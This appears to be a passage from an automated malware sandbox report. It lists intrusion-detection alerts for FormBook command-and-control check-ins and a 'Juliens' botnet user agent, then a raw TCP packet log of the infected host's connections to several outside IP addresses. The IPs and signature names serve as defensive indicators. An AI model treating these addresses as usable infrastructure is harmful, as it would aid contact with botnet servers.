                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            06/19/24-22:42:10.202163TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4980280192.168.2.4195.35.39.119
                                                                            06/19/24-22:39:33.405537TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975480192.168.2.464.46.118.35
                                                                            06/19/24-22:40:07.849802TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976180192.168.2.4162.0.213.94
                                                                            06/19/24-22:40:42.779245TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977380192.168.2.415.204.0.108
                                                                            06/19/24-22:39:45.830045TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975780192.168.2.413.228.81.39
                                                                            06/19/24-22:40:17.162129TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976580192.168.2.4185.234.72.101
                                                                            06/19/24-22:40:23.998195TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976780192.168.2.4172.82.177.221
                                                                            06/19/24-22:40:35.180716TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977080192.168.2.415.204.0.108
                                                                            06/19/24-22:42:08.294897TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980180192.168.2.4188.114.97.3
                                                                            06/19/24-22:39:53.502045TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976080192.168.2.413.228.81.39
                                                                            06/19/24-22:40:15.470191TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976480192.168.2.4162.0.213.94
                                                                            06/19/24-22:41:48.016075TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4979280192.168.2.466.96.162.149
                                                                            06/19/24-22:40:42.779245TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977380192.168.2.415.204.0.108
                                                                            06/19/24-22:41:53.074822TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979580192.168.2.466.96.162.149
                                                                            06/19/24-22:40:15.470191TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976480192.168.2.4162.0.213.94
                                                                            06/19/24-22:40:59.152934TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977580192.168.2.4194.9.94.86
                                                                            06/19/24-22:41:37.810060TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978980192.168.2.4202.95.21.152
                                                                            06/19/24-22:41:09.959658TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977880192.168.2.435.214.235.206
                                                                            06/19/24-22:38:48.022806TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4974380192.168.2.4195.35.39.119
                                                                            06/19/24-22:40:29.074365TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976980192.168.2.4172.82.177.221
                                                                            06/19/24-22:41:51.953723TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979480192.168.2.466.29.145.248
                                                                            06/19/24-22:39:48.363131TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975880192.168.2.413.228.81.39
                                                                            06/19/24-22:41:12.502188TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977980192.168.2.435.214.235.206
                                                                            06/19/24-22:40:29.074365TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976980192.168.2.4172.82.177.221
                                                                            06/19/24-22:40:56.623074TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977480192.168.2.4194.9.94.86
                                                                            06/19/24-22:39:30.874203TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975380192.168.2.464.46.118.35
                                                                            06/19/24-22:41:32.734377TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978580192.168.2.4202.95.21.152
                                                                            06/19/24-22:38:48.022806TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.4195.35.39.119
                                                                            06/19/24-22:41:34.315743TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4978680192.168.2.418.178.206.118
                                                                            06/19/24-22:39:53.502045TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976080192.168.2.413.228.81.39
                                                                            06/19/24-22:41:59.543505TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979880192.168.2.466.29.145.248
                                                                            06/19/24-22:41:13.738083TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978080192.168.2.4162.241.253.174
                                                                            06/19/24-22:42:05.756419TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979980192.168.2.4188.114.97.3
                                                                            06/19/24-22:39:19.761339TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975080192.168.2.4185.137.235.193
                                                                            06/19/24-22:39:11.624328TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.4162.241.2.254
                                                                            06/19/24-22:39:03.970093TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4974580192.168.2.4162.241.2.254
                                                                            06/19/24-22:39:11.624328TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4974880192.168.2.4162.241.2.254
                                                                            06/19/24-22:41:31.772403TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4978480192.168.2.418.178.206.118
                                                                            06/19/24-22:41:45.471658TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4979180192.168.2.466.96.162.149
                                                                            06/19/24-22:40:37.720072TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977180192.168.2.415.204.0.108
                                                                            06/19/24-22:39:17.228084TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4974980192.168.2.4185.137.235.193
                                                                            06/19/24-22:41:30.198083TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978380192.168.2.4202.95.21.152
                                                                            06/19/24-22:39:24.826581TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975280192.168.2.4185.137.235.193
                                                                            06/19/24-22:39:38.488834TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4975680192.168.2.464.46.118.35
                                                                            06/19/24-22:40:10.387191TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976280192.168.2.4162.0.213.94
                                                                            06/19/24-22:39:06.525913TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4974680192.168.2.4162.241.2.254
                                                                            06/19/24-22:39:24.826581TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.4185.137.235.193
                                                                            06/19/24-22:42:07.668525TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4980080192.168.2.4195.35.39.119
                                                                            06/19/24-22:41:04.218070TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4977780192.168.2.4194.9.94.86
                                                                            06/19/24-22:41:17.565460TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978280192.168.2.435.214.235.206
                                                                            06/19/24-22:41:39.388327TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4979080192.168.2.418.178.206.118
                                                                            06/19/24-22:40:21.462056TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4976680192.168.2.4172.82.177.221
                                                                            06/19/24-22:41:53.074822TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4979580192.168.2.466.96.162.149
                                                                            06/19/24-22:41:54.484353TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979680192.168.2.466.29.145.248
                                                                            06/19/24-22:39:38.488834TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975680192.168.2.464.46.118.35
                                                                            06/19/24-22:41:17.565460TCP2844299ETPRO TROJAN MSIL/Juliens Botnet User-Agent4978280192.168.2.435.214.235.206
                                                                            06/19/24-22:41:04.218070TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977780192.168.2.4194.9.94.86
                                                                            06/19/24-22:41:39.388327TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979080192.168.2.418.178.206.118

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jun 19, 2024 22:38:48.014126062 CEST4974380192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:38:48.019108057 CEST8049743195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:38:48.019210100 CEST4974380192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:38:48.022805929 CEST4974380192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:38:48.027676105 CEST8049743195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:38:48.575244904 CEST8049743195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:38:48.575484037 CEST8049743195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:38:48.578078985 CEST4974380192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:38:48.581814051 CEST4974380192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:38:48.587560892 CEST8049743195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:39:03.962364912 CEST4974580192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:03.967291117 CEST8049745162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:03.967411995 CEST4974580192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:03.970093012 CEST4974580192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:03.975378990 CEST8049745162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:04.568567038 CEST8049745162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:04.568619013 CEST8049745162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:04.568757057 CEST4974580192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:04.568774939 CEST8049745162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:04.568819046 CEST4974580192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:05.486388922 CEST4974580192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:06.514565945 CEST4974680192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:06.524311066 CEST8049746162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:06.524389982 CEST4974680192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:06.525913000 CEST4974680192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:06.535614967 CEST8049746162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:07.024255991 CEST8049746162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:07.024802923 CEST8049746162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:07.024854898 CEST4974680192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:08.033477068 CEST4974680192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:09.067311049 CEST4974780192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:09.072772026 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.073060036 CEST4974780192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:09.080625057 CEST4974780192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:09.086441994 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086498022 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086637974 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086667061 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086720943 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086747885 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086796999 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086824894 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.086850882 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.563412905 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.563790083 CEST8049747162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:09.564002037 CEST4974780192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:10.596075058 CEST4974780192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:11.614290953 CEST4974880192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:11.622426987 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:11.622539997 CEST4974880192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:11.624327898 CEST4974880192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:11.630939007 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:12.113123894 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:12.113171101 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:12.113198996 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:12.113231897 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:12.113317013 CEST4974880192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:12.114039898 CEST4974880192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:12.118910074 CEST4974880192.168.2.4162.241.2.254
                                                                            Jun 19, 2024 22:39:12.123889923 CEST8049748162.241.2.254192.168.2.4
                                                                            Jun 19, 2024 22:39:17.218374014 CEST4974980192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:17.225087881 CEST8049749185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:17.225292921 CEST4974980192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:17.228084087 CEST4974980192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:17.234383106 CEST8049749185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:18.080679893 CEST8049749185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:18.080732107 CEST8049749185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:18.080770016 CEST8049749185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:18.080801964 CEST4974980192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:18.080837965 CEST4974980192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:18.736382961 CEST4974980192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:19.754724979 CEST4975080192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:19.759675980 CEST8049750185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:19.759788990 CEST4975080192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:19.761338949 CEST4975080192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:19.766151905 CEST8049750185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:20.544374943 CEST8049750185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:20.544557095 CEST8049750185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:20.544590950 CEST8049750185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:20.544640064 CEST4975080192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:20.544681072 CEST4975080192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:21.267690897 CEST4975080192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:22.287468910 CEST4975180192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:22.292748928 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.292862892 CEST4975180192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:22.296168089 CEST4975180192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:22.301872969 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.301914930 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.301927090 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.301939011 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.301950932 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.301961899 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.301973104 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.302016973 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:22.302047968 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:23.335171938 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:23.335378885 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:23.335414886 CEST8049751185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:23.335558891 CEST4975180192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:23.335558891 CEST4975180192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:23.799223900 CEST4975180192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:24.818546057 CEST4975280192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:24.823860884 CEST8049752185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:24.824101925 CEST4975280192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:24.826581001 CEST4975280192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:24.831569910 CEST8049752185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:25.576443911 CEST8049752185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:25.576695919 CEST8049752185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:25.576873064 CEST4975280192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:25.580425978 CEST4975280192.168.2.4185.137.235.193
                                                                            Jun 19, 2024 22:39:25.585694075 CEST8049752185.137.235.193192.168.2.4
                                                                            Jun 19, 2024 22:39:30.866628885 CEST4975380192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:30.872467041 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:30.872558117 CEST4975380192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:30.874202967 CEST4975380192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:30.880719900 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:32.109441996 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:32.109575987 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:32.109616041 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:32.109667063 CEST4975380192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:32.110479116 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:32.110511065 CEST804975364.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:32.110652924 CEST4975380192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:32.377064943 CEST4975380192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:33.396056890 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:33.401175022 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:33.401324987 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:33.405536890 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:33.410442114 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.666969061 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.667021036 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.667041063 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.667077065 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.667119980 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:34.667176008 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:34.670361996 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.670501947 CEST804975464.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:34.670567989 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:34.908349037 CEST4975480192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:35.928087950 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:35.933497906 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.933612108 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:35.936759949 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:35.941787958 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.941818953 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.941859007 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.941984892 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.942012072 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.942133904 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.942183018 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.942209959 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:35.942243099 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:37.208005905 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:37.208062887 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:37.208101988 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:37.208136082 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:37.212070942 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:37.212153912 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:37.212236881 CEST804975564.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:37.212299109 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:37.439759016 CEST4975580192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:38.476391077 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:38.481826067 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:38.485121965 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:38.488833904 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:38.493930101 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959783077 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959844112 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959877968 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959909916 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959944010 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959976912 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.959979057 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.960005999 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.960011005 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.960030079 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.960048914 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.960083008 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.960094929 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.964849949 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.964936018 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.965116024 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:39.968106985 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.968765020 CEST4975680192.168.2.464.46.118.35
                                                                            Jun 19, 2024 22:39:39.973582029 CEST804975664.46.118.35192.168.2.4
                                                                            Jun 19, 2024 22:39:45.819883108 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:45.824832916 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:45.824929953 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:45.830044985 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:45.834959984 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.797692060 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.797744989 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.797780037 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.797827005 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:46.798022032 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.798055887 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.798078060 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:46.798089981 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.798125029 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.798135042 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:46.798160076 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.798212051 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:46.798229933 CEST804975713.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:46.798283100 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:47.330241919 CEST4975780192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:48.354379892 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:48.359597921 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:48.359679937 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:48.363131046 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:48.368103027 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305522919 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305581093 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305614948 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305649996 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305651903 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:49.305682898 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305726051 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:49.305736065 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305769920 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305792093 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:49.305804014 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305852890 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305860043 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:49.305891037 CEST804975813.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:49.305953026 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:49.877016068 CEST4975880192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:50.954137087 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:50.959260941 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.959355116 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:50.963115931 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:50.968156099 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968244076 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968271971 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968319893 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968347073 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968508005 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968534946 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968580961 CEST804975913.228.81.39192.168.2.4
